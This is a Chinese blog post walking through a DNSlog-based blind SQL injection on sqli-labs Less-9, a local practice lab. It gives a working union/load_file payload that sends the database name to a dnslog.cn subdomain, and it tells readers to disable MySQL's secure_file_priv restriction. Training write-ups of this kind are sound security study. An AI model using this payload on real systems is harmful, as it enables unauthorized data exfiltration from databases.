SQL DNSlog (injection 第九关)

于 2024-08-16 16:13:15 发布
阅读量176 收藏 1
点赞数 7
文章标签: sql 数据库 网络 爬虫 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baishiqi12/article/details/141257696
版权

简介

        SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。

       SQL注入的一个简要流程:

1、打开目标靶场

 

 2、选择less - 9

3、打开网址dnslog.cn

4、截取信息

可复制一下代码 

5、返回页面

即可查询收集到的信息

6、修改代码

即可获取数据库名称

127.0.0.1/Less-9/?id=1' union select 1,2,(load_file(concat('\\\\',(select database()),'.sdjiw.dnslog.cn\\abc'))) %23

7、提示

若无法使用,则在  phpstudy_pro\Extensions\MySQL5.7.26\my.ini 文件中添加语句

secure_file_priv = '' 即可

安全 

网络安全为人民,网络安全靠人民。

白十七12
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dnslog盲注原理
rane的博客
03-18 1835
Dnslog盲注原理 布尔盲注和时间盲注相当于猜单词的游戏,我们需要对每一位逐步的猜测,效率很低,需要发送很多的请求进行判断,很可能会触发安全设备的防护 我们需要一种方式能够减少请求,直接回显数据——Dnslog注入 Dns在解析的时候会留下日志,通过读取多级域名的解析日志,获取请求信息 Dnslog盲注方法 登录http://ceye.io/网站并注册,得到属于自己的identifier 先尝试...
笔记,后期整理
weixin_30278237的博客
08-06 8175
VM 虚拟各种系统的工具 安装目录 不要放在C盘 需要下载的镜像Windows NT win7 xp server08R2 server12类Nnix centos 6/7/8 ubuntu 14/16/18 kali安装 win7 1g=1024M1M=1024KB1KB=1024bit1bit 是一个字节 一个字节就是8位由0或者1组成(二进制) 10 进制0-9组成的数字...
sql盲注 解决_sql盲注-和sql盲注相的内容-阿里云开发者社区
weixin_39592789的博客
12-19 216
《白帽子讲WEB安全》学习笔记之第7章 注入攻击第7章 注入攻击SQL注入的两个条件:1,用户可以控制输入;2,原本执行的SQL语句并接了用户输入的数据。7.1 sql注入SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码...文章科技小能手2017-11-12946浏览量DVWA系...
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 828
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
Ctfshow web入门 sqli-labs篇 web517-web568 详细题解 全
Jay17的博客
07-30 1096
Ctfshow web入门 sqli-labs篇 web517-web568 详细题解 详细 详细 详细 真的详细
渗透基础-个人小结-后续还会更新
weixin_44420153的博客
11-26 770
一:sql注入 什么是sql注入??? 就是指web应用程序在对用户输入的合法性没有进行严格判断或过滤不严格,导致攻击者可以额外添加sql语句,以此欺骗服务器达到执行非授权的任意查询的动作 Ⅰ:数据库基础 sql中的注释 create database 123 --创建数据库123' --是一个单行注释 /**/ /*这是创建数据库,这个是一个多行注释*/ # 注释后边的 sql中链接字符串的函数 concat(),co
小迪笔记____
kkkkkllllllll的博客
07-01 4566
小迪笔记
最新渗透测试面试题合集
热门推荐
网络安全
05-17 1万+
⽹上整理的渗透测试⾯试问题⼤全,有些 HW ⾯试的题,已经收集好了,提供给⼤家。现在就是毕业季节,希望各位都能找到好工作。 渗透篇 1、介绍⼀下⾃认为有趣的挖洞经历 挖洞也有分很多种类型,⼀种是以渗透、⼀种是以找漏洞为主,如果是前者会想各种办法获取权限继⽽获取想要的的东⻄完成渗透⽬标,这类跟 HW 类似,⽬标各种漏洞不算,要有 Shell,服务器权限才给分,这才是最接近实战渗透,跟某部⻔有合作的话也是属于这种打击⽹络犯罪获得权限、传销数据、组织架构,服务器权限、等…
sql injection(SQL注入)教程
10-25
SQL注入是一种常见的网络安全威胁,它利用了应用程序对用户输入数据处理不当的问题,使得攻击者能够操纵SQL查询,获取、修改、删除数据库中的敏感信息,甚至完全控制数据库服务器。本教程将详细讲解SQL注入的各个...
SQL Injection with MySQL 注入分析
09-14
总之,理解SQL注入的原理和机制对于保护Web应用程序至重要。开发人员应始终注代码的安全性,避免因疏忽而使应用程序成为潜在的目标。同时,定期进行安全审计和更新安全策略也是防范SQL注入的键。
advanced_sql_injection.rar_sql injection
09-24
how to prevent sql injection attack
ART OF WEB-SQL-INJECTION第2卷 ORACLE篇
09-14
SQL注入】是一种常见的网络安全漏洞,发生在Web应用程序中,攻击者通过输入恶意...了解并掌握这些知识对于Web开发者和数据库管理员来说至重要,因为有效的预防措施可以大大降低Oracle数据库遭受SQL注入攻击的风险。
ORACLE LATERAL-SQL-INJECTION 个人见解
09-14
Oracle Lateral SQL Injection 是一种针对Oracle数据库的新型SQL注入攻击技术,主要出现在SQL语句的动态构造和数据类型转换过程中。这种攻击模式尤其在处理DATE和NUMBER类型转换为VARCHAR时出现,由于格式字符的问题...
sql】MySQL 中的数值格式化函数:FORMAT、ROUND 和 TRUNCATE
longforone的博客
08-15 236
FORMAT。
NoSQL之 Redis 配置与优化
YYL0019的博客
08-12 718
Redis 服务器程序是单进程模型,也就是在一台服务器上可以同时启动多个Redis 进程, 而 Redis 的实际处理速度则是完全依靠于主进程的执行效率。事实上,每秒同步也是异步完成的,其效率也是非常高的,弊端是一旦系统出现宕机现象,那么这一秒钟之内修改的数据将会丢失。性能最大化,对于Redis的服务进程而言,在开始持久化时,它唯一需要做的只是fork出子进程,之后再由子进程完成这些持久化的工作,这样就可以极大的避免服务进程执行IO操作了。对于普通的BBS 网站,往往也会存在高并发的写数据请求。
浅谈SQL Server、Oracle和MySQL
a876106354的博客
08-15 465
SQL Server 是Microsoft公司推出的系型数据库管理系统。具有使用方便可伸缩性好与相软件集成程度高等优点,可跨越从运行MicrosoftWindows 98的膝上型电脑到运行2012 的大型多处理器的服务器等多种平台使用。Microsoft SQL Server 是一个全面的数据库平台,使用集成的商业智能(BI)工具提供了企业级的数据管理。数据库引擎为系型数据和结构化数据提供了更安全可靠的存储功能,使您可以构建和管理用于业务的高可用和高性能的数据应用程序。MySQL是一个。
hive sql 处理多层 json 数组
最新发布
第一片心意的博客
08-15 632
通过 hive sql,展开包含多层 json 数组的字符串,然后获取到每个子 json 中的值。
漏洞复现-CRMEB 开源商城 sid 参数 SQL 注入漏洞
玄道的网安博客
08-12 398
是使用extractvalue()函数从数据库中提取数据,并检查提取的数据,当与MD5进行哈希时,是否与特定的哈希值匹配。CRMEB打通版v4是免费开源商城系统,UINAPP+thinkphp6框架商城.CRMEB打通版/api/products路径下的sid参数存在未经过滤的SQL语句拼接导致SQL注入。攻击者除了可以利⽤ SQL 注⼊漏洞获取数据库中的信息(例如,管理员后台密码、站点的⽤户个⼈信息)之外,甚⾄在⾼权限的情况可向服务器中写⼊⽊⻢,进⼀步获取服务器系统权限。披露日期:2023/10/9。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值